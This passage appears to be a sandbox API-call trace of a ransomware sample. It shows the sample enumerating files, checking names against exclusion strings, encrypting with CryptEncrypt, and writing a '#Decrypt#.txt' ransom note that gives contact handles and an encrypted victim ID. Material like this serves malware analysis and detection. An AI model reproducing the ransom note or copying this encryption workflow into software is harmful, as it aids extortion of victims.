(lpString1="mainimage-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.465] lstrlenW (lpString=".testttjffg") returned 11 [0251.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.465] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.465] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x559, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="notes-static.png", cAlternateFileName="")) returned 1 [0251.465] lstrcmpiW (lpString1="notes-static.png", lpString2="Windows") returned -1 [0251.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 73 [0251.465] StrStrIW (lpFirst="notes-static.png", lpSrch=".horseleader") returned 0x0 [0251.465] lstrcmpW (lpString1="notes-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.466] lstrcmpW 
(lpString1="notes-static.png", lpString2="_uninstalling_.png") returned 1 [0251.466] lstrlenW (lpString=".testttjffg") returned 11 [0251.466] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", lpSrch=".testttjffg") returned 0x0 [0251.466] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.466] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.467] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="play-static.png", cAlternateFileName="")) returned 1 [0251.467] lstrcmpiW (lpString1="play-static.png", lpString2="Windows") returned -1 [0251.467] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 72 [0251.467] StrStrIW (lpFirst="play-static.png", lpSrch=".horseleader") returned 0x0 [0251.467] lstrcmpW (lpString1="play-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.467] lstrcmpW 
(lpString1="play-static.png", lpString2="_uninstalling_.png") returned 1 [0251.467] lstrlenW (lpString=".testttjffg") returned 11 [0251.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", lpSrch=".testttjffg") returned 0x0 [0251.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.468] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.468] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="play-static.png", cAlternateFileName="")) returned 0 [0251.468] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.469] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\#Decrypt#.txt") returned 70 [0251.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.471] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.471] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.472] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.472] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.472] CloseHandle (hObject=0x158) returned 1 [0251.472] 
GetProcessHeap () returned 0x780000 [0251.473] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.473] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecb0968, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ecb0968, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BlackRectangle.bmp", cAlternateFileName="")) returned 1 [0251.473] lstrcmpiW (lpString1="BlackRectangle.bmp", lpString2="Windows") returned -1 [0251.473] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 66 [0251.473] StrStrIW (lpFirst="BlackRectangle.bmp", lpSrch=".horseleader") returned 0x0 [0251.473] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.473] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="_uninstalling_.png") returned 1 [0251.473] lstrlenW (lpString=".testttjffg") returned 11 [0251.473] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", lpSrch=".testttjffg") returned 0x0 [0251.473] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.475] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_glass.png", cAlternateFileName="")) returned 1 [0251.475] lstrcmpiW (lpString1="circleround_glass.png", lpString2="Windows") returned -1 [0251.475] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 69 [0251.475] StrStrIW (lpFirst="circleround_glass.png", lpSrch=".horseleader") returned 0x0 [0251.475] lstrcmpW (lpString1="circleround_glass.png", lpString2="#Decrypt#.txt") returned 1 [0251.475] lstrcmpW (lpString1="circleround_glass.png", lpString2="_uninstalling_.png") returned 1 [0251.475] lstrlenW (lpString=".testttjffg") returned 11 [0251.475] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", lpSrch=".testttjffg") returned 0x0 [0251.475] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.475] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.476] lstrcmpiW (lpString1="circleround_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.476] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 83 [0251.476] StrStrIW (lpFirst="circleround_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.476] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.476] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.476] lstrlenW (lpString=".testttjffg") returned 11 [0251.476] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.476] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.476] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.477] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebcc13a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebcc13a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_videoinset.png", cAlternateFileName="")) returned 1 [0251.477] lstrcmpiW (lpString1="circleround_videoinset.png", lpString2="Windows") returned -1 [0251.477] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 74 [0251.477] StrStrIW (lpFirst="circleround_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.478] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.478] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.478] lstrlenW (lpString=".testttjffg") returned 11 [0251.478] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.478] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.478] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.478] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edbb2f3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6edbb2f3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c53d379, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.478] lstrcmpiW (lpString1="Circle_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.478] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned 72 [0251.478] StrStrIW (lpFirst="Circle_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.478] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.479] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.479] lstrlenW (lpString=".testttjffg") returned 11 [0251.479] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.479] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.479] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.479] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.479] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e990cc7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e990cc7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.479] lstrcmpiW (lpString1="circle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.479] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned 74 [0251.479] StrStrIW (lpFirst="circle_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.479] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.480] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.480] lstrlenW (lpString=".testttjffg") returned 11 [0251.480] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.480] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.480] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 
1 [0251.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.480] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_SelectionSubpictureA.png", cAlternateFileName="")) returned 1 [0251.480] lstrcmpiW (lpString1="Circle_SelectionSubpictureA.png", lpString2="Windows") returned -1 [0251.480] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned 79 [0251.480] StrStrIW (lpFirst="Circle_SelectionSubpictureA.png", lpSrch=".horseleader") returned 0x0 [0251.481] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="#Decrypt#.txt") returned 1 [0251.481] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="_uninstalling_.png") returned 1 [0251.481] lstrlenW (lpString=".testttjffg") returned 11 [0251.481] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", lpSrch=".testttjffg") returned 0x0 [0251.481] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.481] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 
| out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.481] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_SelectionSubpictureB.png", cAlternateFileName="")) returned 1 [0251.481] lstrcmpiW (lpString1="Circle_SelectionSubpictureB.png", lpString2="Windows") returned -1 [0251.481] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned 79 [0251.481] StrStrIW (lpFirst="Circle_SelectionSubpictureB.png", lpSrch=".horseleader") returned 0x0 [0251.482] lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="#Decrypt#.txt") returned 1 [0251.482] 